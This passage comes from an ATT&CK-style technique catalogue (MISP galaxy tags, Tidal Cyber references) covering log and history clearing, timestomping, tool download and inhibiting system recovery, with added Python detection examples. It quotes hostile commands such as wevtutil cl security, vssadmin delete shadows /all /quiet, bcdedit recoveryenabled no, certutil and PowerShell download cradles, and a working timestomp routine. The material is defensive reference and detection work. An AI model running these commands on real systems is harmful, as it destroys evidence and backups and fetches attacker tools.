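As an added example covering both this section and Impair Command History Logging above (not code from the page), the Python below does two things: it models how bash's <code>HISTCONTROL</code> decides which commands ever reach the history file, so the leading-space trick can be reasoned about concretely, and it scans shell and PowerShell command streams for the impairing and clearing commands both sections list. The command samples are constructed; <code>HISTFILE=/dev/null</code> and <code>HISTSIZE=0</code> are added here as equivalents of the page's <code>unset HISTFILE</code> and <code>HISTFILESIZE=0</code> cases, and are labelled as such in the code.

```python
"""Command-history impairment and clearing, for bash and PSReadLine.

Added example, not from the page. simulate_bash_history() models the
HISTCONTROL rules; the scan functions flag the commands both sections list.
All sample inputs are constructed.
"""
import re


def simulate_bash_history(commands, histcontrol="ignoreboth"):
    """Return the commands bash would keep in its history list.

    ignorespace drops lines that begin with a space, ignoredups drops a line
    identical to the previous kept one, ignoreboth does both.
    """
    opts = set(histcontrol.split(":")) if histcontrol else set()
    skip_space = bool(opts & {"ignorespace", "ignoreboth"})
    skip_dups = bool(opts & {"ignoredups", "ignoreboth"})
    kept = []
    for cmd in commands:
        if skip_space and cmd.startswith(" "):
            continue
        if skip_dups and kept and kept[-1] == cmd:
            continue
        kept.append(cmd)
    return kept


SHELL_PATTERNS = [
    (re.compile(r"^\s*unset\s+HISTFILE\b"), "HISTFILE unset: nothing written at exit"),
    (re.compile(r"\bHISTFILE=(/dev/null|''|\"\")"), "HISTFILE redirected (added equivalent)"),
    (re.compile(r"\bHIST(FILE)?SIZE=0\b"), "history size zeroed"),
    (re.compile(r"\bHISTCONTROL=\S*ignore(space|both)"), "space-prefixed commands hidden"),
    (re.compile(r"^\s*history\s+-c\b"), "in-memory history cleared"),
    (re.compile(r"\brm\s+(-\S+\s+)*\S*\.bash_history\b"), "history file deleted"),
]
PS_PATTERNS = [
    (re.compile(r"\bSet-PSReadLineOption\b.*?-HistorySaveStyle\s+SaveNothing\b", re.I), "PSReadLine saving disabled"),
    (re.compile(r"\bSet-PSReadLineOption\b.*?-HistorySavePath\b", re.I), "PSReadLine history redirected"),
    (re.compile(r"\bClear-History\b", re.I), "in-session history cleared"),
    (re.compile(r"\b(Remove-Item|del|rm|ri)\b.*?ConsoleHost_history\.txt\b", re.I), "PSReadLine history file deleted"),
]


def scan_lines(lines, patterns):
    """Return (line, reason) for each line matching one of the patterns."""
    hits = []
    for line in lines:
        for pattern, reason in patterns:
            if pattern.search(line):
                hits.append((line, reason))
                break
    return hits


# Constructed samples.
SESSION_SAMPLE = ["ls", "ls", " curl http://203.0.113.7/x -o /tmp/x",
                  "cat /etc/passwd", "cat /etc/passwd"]
SHELL_SAMPLE = [
    "export HISTCONTROL=ignorespace",
    "unset HISTFILE",
    "export HISTFILESIZE=0",
    "ls -la /root",
    "history -c",
    "rm -f ~/.bash_history",
]
PS_SAMPLE = [
    "Set-PSReadLineOption -HistorySaveStyle SaveNothing",
    "Get-Process",
    "Clear-History",
    r"Remove-Item $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt",
]

if __name__ == "__main__":
    print("kept with ignoreboth:", simulate_bash_history(SESSION_SAMPLE))
    for line, reason in scan_lines(SHELL_SAMPLE, SHELL_PATTERNS) + scan_lines(PS_SAMPLE, PS_PATTERNS):
        print(reason, "<-", line)
```

The simulation makes the defensive point explicit: with the common <code>ignoreboth</code> default, the space-prefixed download never enters the history list at all, so <code>~/.bash_history</code> is not evidence of absence. Command-line auditing that does not depend on the shell (auditd execve rules, EDR process telemetry) is what records those commands.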

The tag is: misp-galaxy:technique="Clear Command History"

Clear Linux or Mac System Logs

Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. The majority of native system logging is stored under the <code>/var/log/</code> directory. Subfolders in this directory categorize logs by their related functions, such as:<sup>[[Linux Logs](https://app.tidalcyber.com/references/aa25e385-802c-4f04-81bb-bb7d1a7599ec)]</sup>

  • <code>/var/log/messages</code>: General and system-related messages

  • <code>/var/log/secure</code> or <code>/var/log/auth.log</code>: Authentication logs

  • <code>/var/log/utmp</code> or <code>/var/log/wtmp</code>: Login records

  • <code>/var/log/kern.log</code>: Kernel logs

  • <code>/var/log/cron.log</code>: Crond logs

  • <code>/var/log/maillog</code>: Mail server logs

  • <code>/var/log/httpd/</code>: Web server access and error logs

The tag is: misp-galaxy:technique="Clear Linux or Mac System Logs"

Clear Mailbox Data

Adversaries may modify mail and mail application data to remove evidence of their activity. Email applications allow users and other programs to export and delete mailbox data via command line tools or use of APIs. Mail application data can be emails, email metadata, or logs generated by the application or operating system, such as export requests.

Adversaries may manipulate emails and mailbox data to remove logs, artifacts, and metadata, such as evidence of [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533), [Internal Spearphishing](https://app.tidalcyber.com/technique/4f4ea659-7653-4bfd-a525-b2af32c5899b), [Email Collection](https://app.tidalcyber.com/technique/3569b783-1be5-414b-adb9-42c47ceee1cc), [Mail Protocols](https://app.tidalcyber.com/technique/350fd3f9-2d62-498f-be62-fc4b9907ff02) for command and control, or email-based exfiltration such as [Exfiltration Over Alternative Protocol](https://app.tidalcyber.com/technique/192d25ea-bae1-48e4-88de-e0acd481ab88). For example, to remove evidence on Exchange servers adversaries have used the <code>ExchangePowerShell</code> [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) module, including <code>Remove-MailboxExportRequest</code> to remove evidence of mailbox exports.<sup>[[Volexity SolarWinds](https://app.tidalcyber.com/references/355cecf8-ef3e-4a6e-a652-3bf26fe46d88)]</sup><sup>[[ExchangePowerShell Module](https://app.tidalcyber.com/references/8af67c2a-15e2-48c9-9ec2-b62ffca0f677)]</sup> On Linux and macOS, adversaries may also delete emails through a command line utility called <code>mail</code> or use [AppleScript](https://app.tidalcyber.com/technique/9f06ef9b-d587-41d3-8fc8-7d539dac5701) to interact with APIs on macOS.<sup>[[Cybereason Cobalt Kitty 2017](https://app.tidalcyber.com/references/bf838a23-1620-4668-807a-4354083d69b1)]</sup><sup>[[mailx man page](https://app.tidalcyber.com/references/6813a1a2-fbe0-4809-aad7-734997e59bea)]</sup>

Adversaries may also remove emails and metadata/headers indicative of spam or suspicious activity (for example, through the use of organization-wide transport rules) to reduce the likelihood of malicious emails being detected by security products.<sup>[[Microsoft OAuth Spam 2022](https://app.tidalcyber.com/references/086c06a0-3960-5fa8-b034-cef37a3aee90)]</sup>

The tag is: misp-galaxy:technique="Clear Mailbox Data"

Clear Network Connection History and Configurations

Adversaries may clear or remove evidence of malicious network connections in order to clean up traces of their operations. Configuration settings as well as various artifacts that highlight connection history may be created on a system and/or in application logs from behaviors that require network connections, such as [Remote Services](https://app.tidalcyber.com/technique/30ef3f13-5e9b-4712-9adf-f0da4ef157a1) or [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4). Defenders may use these artifacts to monitor or otherwise analyze network connections created by adversaries.

Network connection history may be stored in various locations. For example, RDP connection history may be stored in Windows Registry values under <sup>[[Microsoft RDP Removal](https://app.tidalcyber.com/references/367d3f80-9b13-44fa-938a-744a95518571)]</sup>:

  • <code>HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default</code>

  • <code>HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers</code>

Windows may also store information about recent RDP connections in files such as <code>C:\Users\%username%\Documents\Default.rdp</code> and <code>C:\Users\%username%\AppData\Local\Microsoft\Terminal Server Client\Cache\</code>.<sup>[[Moran RDPieces](https://app.tidalcyber.com/references/794331fb-f1f2-4aaa-aae8-d1c4c95fb00f)]</sup> Similarly, macOS and Linux hosts may store information highlighting connection history in system logs (such as those stored in <code>/Library/Logs</code> and/or <code>/var/log/</code>).<sup>[[Apple Culprit Access](https://app.tidalcyber.com/references/9254d3f5-7fc1-4710-b885-b0ddb3a3dca9)]</sup><sup>[[FreeDesktop Journal](https://app.tidalcyber.com/references/5ded9060-9a23-42dc-b13b-15e4e3ccabf9)]</sup><sup>[[Apple Unified Log Analysis Remote Login and Screen Sharing](https://app.tidalcyber.com/references/a2169171-8e4a-4faa-811c-98b6204a5a57)]</sup>

Malicious network connections may also require changes to third-party applications or network configuration settings, such as [Disable or Modify System Firewall](https://app.tidalcyber.com/technique/4f7d0afb-92ce-429b-9ef5-dc6a7fc4f4a8) or tampering to enable [Proxy](https://app.tidalcyber.com/technique/ba6a869a-c870-4be6-bc08-e078f0efdc3b). Adversaries may delete or modify this data to conceal indicators and/or impede defensive analysis.

The tag is: misp-galaxy:technique="Clear Network Connection History and Configurations"

Clear Persistence

Adversaries may clear artifacts associated with previously established persistence on a host system to remove evidence of their activity. This may involve various actions, such as removing services, deleting executables, [Modify Registry](https://app.tidalcyber.com/technique/0dfeab84-3c42-4b56-9021-70fe5be4092b), [Plist File Modification](https://app.tidalcyber.com/technique/ee177ad0-d282-42c0-91f9-7bcf724e3d31), or other methods of cleanup to prevent defenders from collecting evidence of their persistent presence.<sup>[[Cylance Dust Storm](https://app.tidalcyber.com/references/001dd53c-74e6-4add-aeb7-da76b0d2afe8)]</sup> Adversaries may also delete accounts previously created to maintain persistence (i.e. Create Account).<sup>[[Talos - Cisco Attack 2022](https://app.tidalcyber.com/references/143182ad-6a16-5a0d-a5c4-7dae721a9e26)]</sup>

In some instances, artifacts of persistence may also be removed once an adversary’s persistence is executed in order to prevent errors with the new instance of the malware.<sup>[[NCC Group Team9 June 2020](https://app.tidalcyber.com/references/0ea8f87d-e19d-438d-b05b-30f2ccd0ea3b)]</sup>

The tag is: misp-galaxy:technique="Clear Persistence"

Clear Windows Event Logs

Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Windows Event Logs are a record of a computer’s alerts and notifications. There are three system-defined sources of events: System, Application, and Security, with five event types: Error, Warning, Information, Success Audit, and Failure Audit.

The event logs can be cleared with the following utility commands:

  • <code>wevtutil cl system</code>

  • <code>wevtutil cl application</code>

  • <code>wevtutil cl security</code>

These logs may also be cleared through other mechanisms, such as the event viewer GUI or [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde). For example, adversaries may use the PowerShell command <code>Remove-EventLog -LogName Security</code> to delete the Security EventLog and after reboot, disable future logging. Note: events may still be generated and logged in the .evtx file between the time the command is run and the reboot.<sup>[[disable_win_evt_logging](https://app.tidalcyber.com/references/408c0c8c-5d8e-5ebe-bd31-81b405c615d8)]</sup>

The tag is: misp-galaxy:technique="Clear Windows Event Logs"

File Deletion

Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: [Ingress Tool Transfer](https://app.tidalcyber.com/technique/4499ce34-9871-4879-883c-19ddb940f242)) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary’s footprint.

There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well.<sup>[[Microsoft SDelete July 2016](https://app.tidalcyber.com/references/356c7d49-5abc-4566-9657-5ce58cf7be67)]</sup> Examples of built-in [Command and Scripting Interpreter](https://app.tidalcyber.com/technique/a2184d53-63b1-4c40-81ed-da799080c36c) functions include <code>del</code> on Windows and <code>rm</code> or <code>unlink</code> on Linux and macOS.

The tag is: misp-galaxy:technique="File Deletion"

Network Share Connection Removal

Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation. Windows shared drive and [SMB/Windows Admin Shares](https://app.tidalcyber.com/technique/bc2f2c6c-ffe7-4e78-bbac-369f6781bbdd) connections can be removed when no longer needed. [Net](https://app.tidalcyber.com/software/c9b8522f-126d-40ff-b44e-1f46098bd8cc) is an example utility that can be used to remove network share connections with the <code>net use \\system\share /delete</code> command. <sup>[[Technet Net Use](https://app.tidalcyber.com/references/f761d4b6-8fc5-4037-aa34-7982c17f8bed)]</sup>

The tag is: misp-galaxy:technique="Network Share Connection Removal"

Timestomp

Adversaries may modify file time attributes to hide new files or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to match the files in the same folder. This is done, for example, on files that the adversary has modified or created, so that they do not stand out to forensic investigators or file analysis tools.

Timestomping may be used along with file name [Masquerading](https://app.tidalcyber.com/technique/a0adacc1-8d2a-4e0b-92c1-3766264df4fd) to hide malware and tools.<sup>[[WindowsIR Anti-Forensic Techniques](https://app.tidalcyber.com/references/646211a7-77be-4e5a-bd02-eeb70d67113d)]</sup>
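The mechanics behind the paragraphs above, as an added example that is not code from this page or from the MISP project: the stomp itself is a single `utime()` call (the same thing `touch -t`/`touch -r` does), and the forensic check exploits the fact that user space cannot set the inode change time, so a backdated mtime ends up far older than the ctime the kernel stamps at stomp time. The threshold and the file content are assumptions of this example. The check is for Linux/macOS filesystems; on NTFS the analogous comparison is between the `$STANDARD_INFORMATION` timestamps (which `SetFileTime` rewrites) and the `$FILE_NAME` timestamps (which it does not).

```python
# Added example (not page or MISP code): timestomp a file, then apply the
# mtime-vs-ctime heuristic an analyst would use to catch it on POSIX systems.
import os
import tempfile

SECONDS_PER_DAY = 86400
BACKDATE_EPOCH = 1433160000.0   # 2015-06-01T12:00:00Z, an arbitrary "old" time


def timestomp(path: str, epoch_seconds: float) -> None:
    """Backdate atime and mtime, as a timestomping tool or `touch -t` would.
    utime() cannot set ctime: the kernel stamps ctime with the current clock on
    every inode metadata change, which is exactly what makes the stomp visible."""
    os.utime(path, (epoch_seconds, epoch_seconds))


def looks_timestomped(path: str, min_gap_days: float = 1.0) -> bool:
    """Heuristic: a file whose mtime lies well before its ctime had its
    timestamps touched after the last content change. Normal writes move both
    together; chmod/chown/rename move only ctime, so require a large gap and
    treat hits as leads for review rather than proof."""
    st = os.stat(path)
    return (st.st_ctime - st.st_mtime) > min_gap_days * SECONDS_PER_DAY


def demo() -> tuple:
    """Create a fresh file, stomp it back to 2015, return the (before, after)
    verdicts of the heuristic. The file content is constructed for the demo."""
    fd, path = tempfile.mkstemp()
    os.write(fd, b"dropped tool")
    os.close(fd)
    try:
        before = looks_timestomped(path)
        timestomp(path, BACKDATE_EPOCH)
        after = looks_timestomped(path)
    finally:
        os.unlink(path)
    return before, after


if __name__ == "__main__":
    print("before/after stomp flagged:", demo())
```

`demo()` returns `(False, True)`: the fresh file has ctime and mtime within the same second, while the stomped file carries a 2015 mtime next to a ctime of "now". A stomp that also wants to hide from this check would have to alter the kernel clock or the raw filesystem, which is why ctime (and `$FILE_NAME` on NTFS) is worth keeping in any timeline.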

The tag is: misp-galaxy:technique="Timestomp"

Indicator Removal

Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. Various artifacts may be created by an adversary or something that can be attributed to an adversary’s actions. Typically these artifacts are used as defensive indicators related to monitored events, such as strings from downloaded files, logs that are generated from user actions, and other data analyzed by defenders. Location, format, and type of artifact (such as command or login history) are often specific to each platform.

Removal of these indicators may interfere with event collection, reporting, or other processes used to detect intrusion activity. This may compromise the integrity of security solutions by causing notable events to go unreported. This activity may also impede forensic analysis and incident response, due to lack of sufficient data to determine what occurred.

The tag is: misp-galaxy:technique="Indicator Removal"

Indirect Command Execution

Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://app.tidalcyber.com/software/98d89476-63ec-4baf-b2b3-86c52170f5d8). For example, [Forfiles](https://app.tidalcyber.com/software/c6dc67a6-587d-4700-a7de-bee043a0031a), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://app.tidalcyber.com/technique/a2184d53-63b1-4c40-81ed-da799080c36c), Run window, or via scripts. <sup>[[VectorSec ForFiles Aug 2017](https://app.tidalcyber.com/references/8088d15d-9512-4d12-a99a-c76ad9dc3390)]</sup> <sup>[[Evi1cg Forfiles Nov 2017](https://app.tidalcyber.com/references/b292b85e-68eb-43c3-9b5b-222810e2f26a)]</sup>

Adversaries may abuse these features for [Defense Evasion](https://app.tidalcyber.com/tactics/8e29c6c9-0c10-4bb0-827d-ff0ab8922726), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://app.tidalcyber.com/software/98d89476-63ec-4baf-b2b3-86c52170f5d8) or file extensions more commonly associated with malicious payloads.

The tag is: misp-galaxy:technique="Indirect Command Execution"

Ingress Tool Transfer

Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as [ftp](https://app.tidalcyber.com/software/062deac9-8f05-44e2-b347-96b59ba166ca). Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. [Lateral Tool Transfer](https://app.tidalcyber.com/technique/3dea57fc-3131-408b-a1fd-ff2eea1d858f)).

On Windows, adversaries may use various utilities to download tools, such as copy, finger, [certutil](https://app.tidalcyber.com/software/2fe21578-ee31-4ee8-b6ab-b5f76f97d043), and [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) commands such as <code>IEX(New-Object Net.WebClient).downloadString()</code> and <code>Invoke-WebRequest</code>. On Linux and macOS systems, a variety of utilities also exist, such as curl, scp, sftp, tftp, rsync, finger, and wget.<sup>[[t1105_lolbas](https://app.tidalcyber.com/references/80e649f5-6c74-4d66-a452-4f4cd51501da)]</sup>

Adversaries may also abuse installers and package managers, such as yum or winget, to download tools to victim hosts.

Files can also be transferred using various [Web Service](https://app.tidalcyber.com/technique/a729feee-8e21-444e-8eea-2ec595b09931)s as well as native or otherwise present tools on the victim system.<sup>[[PTSecurity Cobalt Dec 2016](https://app.tidalcyber.com/references/2de4d38f-c99d-4149-89e6-0349a4902aa2)]</sup> In some cases, adversaries may be able to leverage services that sync between a web-based and an on-premises client, such as Dropbox or OneDrive, to transfer files onto victim systems. For example, by compromising a cloud account and logging into the service’s web portal, an adversary may be able to trigger an automatic syncing process that transfers the file onto the victim’s machine.<sup>[[Dropbox Malware Sync](https://app.tidalcyber.com/references/06ca63fa-8c6c-501c-96d3-5e7e45ca1e04)]</sup>

The tag is: misp-galaxy:technique="Ingress Tool Transfer"

Inhibit System Recovery

Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.<sup>[[Talos Olympic Destroyer 2018](https://app.tidalcyber.com/references/25a2e179-7abd-4091-8af4-e9d2bf24ef11)]</sup><sup>[[FireEye WannaCry 2017](https://app.tidalcyber.com/references/34b15fe1-c550-4150-87bc-ac9662547247)]</sup> This may deny access to available backups and recovery options.

Operating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of [Data Destruction](https://app.tidalcyber.com/technique/e5016c2b-85fe-4e6b-917d-0dd5b441cc34) and Data Encrypted for Impact.<sup>[[Talos Olympic Destroyer 2018](https://app.tidalcyber.com/references/25a2e179-7abd-4091-8af4-e9d2bf24ef11)]</sup><sup>[[FireEye WannaCry 2017](https://app.tidalcyber.com/references/34b15fe1-c550-4150-87bc-ac9662547247)]</sup> Furthermore, adversaries may disable recovery notifications, then corrupt backups.<sup>[[disable_notif_synology_ransom](https://app.tidalcyber.com/references/d53e8f89-df78-565b-a316-cf2644c5ed36)]</sup>

A number of native Windows utilities have been used by adversaries to disable or delete system recovery features:

  • <code>vssadmin.exe</code> can be used to delete all volume shadow copies on a system - <code>vssadmin.exe delete shadows /all /quiet</code>

  • [Windows Management Instrumentation](https://app.tidalcyber.com/technique/c37795d9-8970-461f-9491-3086d6b4b69a) can be used to delete volume shadow copies - <code>wmic shadowcopy delete</code>

  • <code>wbadmin.exe</code> can be used to delete the Windows Backup Catalog - <code>wbadmin.exe delete catalog -quiet</code>

  • <code>bcdedit.exe</code> can be used to disable automatic Windows recovery features by modifying boot configuration data - <code>bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no</code>

  • <code>REAgentC.exe</code> can be used to disable Windows Recovery Environment (WinRE) repair/recovery options of an infected system

On network devices, adversaries may leverage [Disk Wipe](https://app.tidalcyber.com/technique/ea2b3980-05fd-41a3-8ab9-3106e833c821) to delete backup firmware images and reformat the file system, then [System Shutdown/Reboot](https://app.tidalcyber.com/technique/24787dca-6afd-4ab3-ab6c-32e9486ec418) to reload the device. Together this activity may leave network devices completely inoperable and inhibit recovery operations.

Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.<sup>[[ZDNet Ransomware Backups 2020](https://app.tidalcyber.com/references/301da9c8-60de-58f0-989f-6b504e3457a3)]</sup> In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.<sup>[[Dark Reading Code Spaces Cyber Attack](https://app.tidalcyber.com/references/e5a3028a-f4cc-537c-9ddd-769792ab33be)]</sup><sup>[[Rhino Security Labs AWS S3 Ransomware](https://app.tidalcyber.com/references/785c6b11-c5f0-5cb4-931b-cf75fcc368a1)]</sup>
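The command lines quoted in the Clear Windows Event Logs, Clear Network Connection History and Configurations, Network Share Connection Removal, Indirect Command Execution, Ingress Tool Transfer and Inhibit System Recovery entries above are all visible in process-creation telemetry (Sysmon event 1, Security 4688). The following is an added detection example, not code from this page, MISP or Tidal Cyber: it turns those command lines into rules and runs them over constructed records. The field names (`event_id`, `command_line`, `host`, `user`) are this example's assumed post-normalisation schema, not a vendor format; the `reg delete` pattern for the RDP history keys and the `/disable` switch of `REAgentC.exe` are standard-tool usages this page does not itself quote. Event IDs 1102 (Security, "The audit log was cleared") and 104 (System log cleared) are emitted by the log service itself and are checked separately because they fire whatever tool did the clearing.

```python
# Added example (not MISP, Tidal Cyber or ATT&CK code): rule-based matching of
# the defense-evasion / recovery-inhibition command lines listed on this page.
import re

# (rule name, technique on this page, pattern over the command line)
RULES = [
    ("event_log_clear", "Clear Windows Event Logs",
     re.compile(r"\bwevtutil(\.exe)?\s+(cl|clear-log)\b|\b(Remove|Clear)-EventLog\b", re.I)),
    ("rdp_history_clear", "Clear Network Connection History and Configurations",
     re.compile(r"\breg(\.exe)?\s+delete\b.*Terminal Server Client", re.I)),
    ("share_removal", "Network Share Connection Removal",
     re.compile(r"\bnet1?(\.exe)?\s+use\b.*\s/delete\b", re.I)),   # net.exe hands off to net1.exe
    ("indirect_exec", "Indirect Command Execution",
     re.compile(r"\bforfiles(\.exe)?\b.*\s/c\s|\bpcalua(\.exe)?\s+-a\b", re.I)),
    ("ingress_download", "Ingress Tool Transfer",
     re.compile(r"\bcertutil(\.exe)?\b.*-urlcache\b|\bInvoke-WebRequest\b|"
                r"\bNet\.WebClient\b.*\bDownloadString\b", re.I)),
    ("shadow_copy_delete", "Inhibit System Recovery",
     re.compile(r"\bvssadmin(\.exe)?\s+delete\s+shadows\b|\bwmic(\.exe)?\s+shadowcopy\s+delete\b", re.I)),
    ("backup_catalog_delete", "Inhibit System Recovery",
     re.compile(r"\bwbadmin(\.exe)?\s+delete\s+catalog\b", re.I)),
    ("recovery_disable", "Inhibit System Recovery",
     re.compile(r"\bbcdedit(\.exe)?\b.*\b(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)\b"
                r"|\breagentc(\.exe)?\s+/disable\b", re.I)),
]

# Log-service events raised when a log is cleared, independent of the tool used.
LOG_CLEARED_EVENT_IDS = {1102, 104}


def classify(command_line: str) -> list:
    """Rule names whose pattern matches the command line, in RULES order."""
    return [name for name, _, rx in RULES if rx.search(command_line)]


def scan(records) -> list:
    """Return (record, rule names) for every record matching at least one rule."""
    findings = []
    for rec in records:
        hits = []
        if rec.get("event_id") in LOG_CLEARED_EVENT_IDS:
            hits.append("event_log_cleared_audit")
        hits.extend(classify(rec.get("command_line", "")))
        if hits:
            findings.append((rec, hits))
    return findings


# Constructed records in the assumed normalised shape: a cleanup sequence
# followed by one benign process start that must not match.
SAMPLE_RECORDS = [
    {"event_id": 1, "host": "ws01", "user": "corp\\jsmith",
     "command_line": "wevtutil cl security"},
    {"event_id": 1102, "host": "ws01", "user": "corp\\jsmith", "command_line": ""},
    {"event_id": 1, "host": "ws01", "user": "corp\\jsmith",
     "command_line": "vssadmin.exe delete shadows /all /quiet"},
    {"event_id": 1, "host": "ws01", "user": "corp\\jsmith",
     "command_line": "bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures "
                     "& bcdedit /set {default} recoveryenabled no"},
    {"event_id": 1, "host": "ws01", "user": "corp\\jsmith",
     "command_line": "net use \\\\fileserver\\share /delete"},
    {"event_id": 1, "host": "ws01", "user": "corp\\jsmith",
     "command_line": "certutil.exe -urlcache -split -f http://example.invalid/t.exe t.exe"},
    {"event_id": 1, "host": "ws01", "user": "corp\\jsmith",
     "command_line": "C:\\Windows\\System32\\svchost.exe -k netsvcs"},
]

if __name__ == "__main__":
    for rec, hits in scan(SAMPLE_RECORDS):
        print(f"{rec['host']} {rec['user']} eid={rec['event_id']} {hits}: {rec['command_line']}")
```

Six of the seven constructed records match; the `svchost.exe` start does not. In practice the rules are a triage layer: `wevtutil cl` and `vssadmin delete shadows` are rare enough on workstations to alert on directly, whereas `net use /delete` and `certutil -urlcache` need host or user baselining, and the 1102/104 check is the one that still fires when the adversary uses a tool the patterns do not cover.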

The tag is: misp-galaxy:technique="Inhibit System Recovery"

Credential API Hooking

Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.<sup>[[Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017](https://app.tidalcyber.com/references/2b0c16e3-9ea0-455e-ae01-18d9b388fea6)]</sup> Unlike [Keylogging](https://app.tidalcyber.com/technique/7f1798b5-b159-441b-a5ef-3b5c706e1699), this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:

The tag is: misp-galaxy:technique="Credential API Hooking"

GUI Input Capture

Adversaries may mimic common operating system GUI components to prompt users for credentials with a seemingly legitimate prompt. When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: [Bypass User Account Control](https://app.tidalcyber.com/technique/5e1499a1-f1ad-4929-84e1-5d33c371c02d)).

Adversaries may mimic this functionality to prompt users for credentials with a seemingly legitimate prompt for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite.<sup>[[OSX Malware Exploits MacKeeper](https://app.tidalcyber.com/references/8c4bcbc7-ff52-4f7b-a22e-98bf9cfb1040)]</sup> This type of prompt can be used to collect credentials via various languages such as [AppleScript](https://app.tidalcyber.com/technique/9f06ef9b-d587-41d3-8fc8-7d539dac5701)<sup>[[LogRhythm Do You Trust Oct 2014](https://app.tidalcyber.com/references/88a84f9a-e077-4fdd-9936-30fc7b290476)]</sup><sup>[[OSX Keydnap malware](https://app.tidalcyber.com/references/d43e0dd1-0946-4f49-bcc7-3ef38445eac3)]</sup><sup>[[Spoofing credential dialogs](https://app.tidalcyber.com/references/4f8abaae-1483-4bf6-a79c-6a801ae5a640)]</sup> and [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde).<sup>[[LogRhythm Do You Trust Oct 2014](https://app.tidalcyber.com/references/88a84f9a-e077-4fdd-9936-30fc7b290476)]</sup><sup>[[Enigma Phishing for Credentials Jan 2015](https://app.tidalcyber.com/references/7fff81f0-2b99-4f4f-8eca-c6a54c4d8205)]</sup><sup>[[Spoofing credential dialogs](https://app.tidalcyber.com/references/4f8abaae-1483-4bf6-a79c-6a801ae5a640)]</sup> On Linux systems adversaries may launch dialog boxes prompting users for credentials from malicious shell scripts or the command line (i.e. Unix Shell).<sup>[[Spoofing credential dialogs](https://app.tidalcyber.com/references/4f8abaae-1483-4bf6-a79c-6a801ae5a640)]</sup>

The tag is: misp-galaxy:technique="GUI Input Capture"

Keylogging

Adversaries may log user keystrokes to intercept credentials as the user types them. Keylogging is likely to be used to acquire credentials for new access opportunities when [OS Credential Dumping](https://app.tidalcyber.com/technique/368f85f9-2b15-4732-80fe-087694eaf34d) efforts are not effective, and may require an adversary to intercept keystrokes on a system for a substantial period of time before credentials can be successfully captured. In order to increase the likelihood of capturing credentials quickly, an adversary may also perform actions such as clearing browser cookies to force users to reauthenticate to systems.<sup>[[Talos Kimsuky Nov 2021](https://app.tidalcyber.com/references/17927f0e-297a-45ec-8e1c-8a33892205dc)]</sup>

Keylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes.<sup>[[Adventures of a Keystroke](https://app.tidalcyber.com/references/f29ed400-2986-4b2c-9b8a-7dde37562d22)]</sup> Some methods include:

The tag is: misp-galaxy:technique="Keylogging"

Web Portal Capture

Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.

This variation on input capture may be conducted post-compromise using legitimate administrative access as a backup measure to maintain network access through [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4) and [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) or as part of the initial compromise by exploitation of the externally facing web service.<sup>[[Volexity Virtual Private Keylogging](https://app.tidalcyber.com/references/b299f8e7-01da-4d59-9657-ef93cf284cc0)]</sup>

The tag is: misp-galaxy:technique="Web Portal Capture"

Input Capture

